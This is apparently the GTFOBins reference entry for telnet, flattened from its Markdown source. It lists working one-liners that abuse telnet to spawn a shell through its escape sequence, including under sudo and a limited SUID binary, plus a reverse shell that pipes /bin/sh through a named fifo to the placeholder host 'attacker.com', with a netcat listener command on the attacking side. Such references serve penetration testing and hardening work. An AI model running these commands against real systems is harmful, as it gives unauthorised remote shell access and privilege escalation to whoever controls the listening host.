GTFOBins.github.io/_gtfobins/telnet.md

860 B

functions
shell reverse-shell sudo limited-suid
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 telnet $RHOST $RPORT ^] !/bin/sh
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 TF=$(mktemp -u) mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 sudo telnet $RHOST $RPORT ^] !/bin/sh
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 ./telnet $RHOST $RPORT ^] !/bin/sh